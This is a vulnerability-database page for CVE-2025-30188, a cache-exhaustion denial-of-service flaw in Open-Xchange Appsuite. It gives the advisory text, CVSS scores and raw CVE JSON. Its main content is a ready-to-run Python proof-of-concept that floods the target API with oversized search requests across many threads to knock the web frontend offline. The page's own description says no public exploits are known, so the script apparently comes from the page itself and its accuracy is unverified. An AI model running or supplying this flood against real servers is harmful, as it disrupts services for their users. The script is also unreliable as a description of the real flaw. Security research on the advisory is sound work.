Security Vulnerability Report
中文
CVE-2025-30188 CVSS 7.5 HIGH

CVE-2025-30188

Published: 2025-10-31 09:15:47
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Malicious or unintentional API requests can be used to add significant amount of data to caches. Caches may evict information that is required to operate the web frontend, which leads to unavailability of the component. Please deploy the provided updates and patch releases. No publicly available exploits are known

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Open-Xchange Appsuite < 7.10.x patch 48
Open-Xchange Appsuite < 7.18.x patch 33
Open-Xchange Appsuite < 8.x versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-30188 PoC - Cache Poisoning DoS # Target: Open-Xchange Appsuite # Author: Security Researcher import requests import time import threading TARGET_URL = "https://target-server/appsuite/api/" THREAD_COUNT = 10 REQUESTS_PER_THREAD = 1000 def send_malicious_request(session, thread_id): """Send API requests to poison the cache""" headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } # Malicious payload with large data to fill cache payload = { "action": "com.openexchange.contact.search", "data": { "query": "A" * 10000, # Large data to consume cache "folder": "0", "columns": ["1", "2", "3", "4", "5"] } } for i in range(REQUESTS_PER_THREAD): try: response = session.post( TARGET_URL, json=payload, headers=headers, timeout=5 ) print(f"Thread {thread_id} - Request {i}: Status {response.status_code}") except Exception as e: print(f"Thread {thread_id} - Error: {e}") def exploit(): """Execute the cache poisoning attack""" session = requests.Session() threads = [] print("[*] Starting CVE-2025-30188 Cache Poisoning Attack") print(f"[*] Target: {TARGET_URL}") print(f"[*] Threads: {THREAD_COUNT}, Requests per thread: {REQUESTS_PER_THREAD}") start_time = time.time() for i in range(THREAD_COUNT): thread = threading.Thread(target=send_malicious_request, args=(session, i)) thread.start() threads.append(thread) for thread in threads: thread.join() elapsed = time.time() - start_time print(f"[*] Attack completed in {elapsed:.2f} seconds") print("[*] Check target availability - cache should be exhausted") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30188", "sourceIdentifier": "[email protected]", "published": "2025-10-31T09:15:47.133", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious or unintentional API requests can be used to add significant amount of data to caches. Caches may evict information that is required to operate the web frontend, which leads to unavailability of the component. Please deploy the provided updates and patch releases. No publicly available exploits are known"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0002.json", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.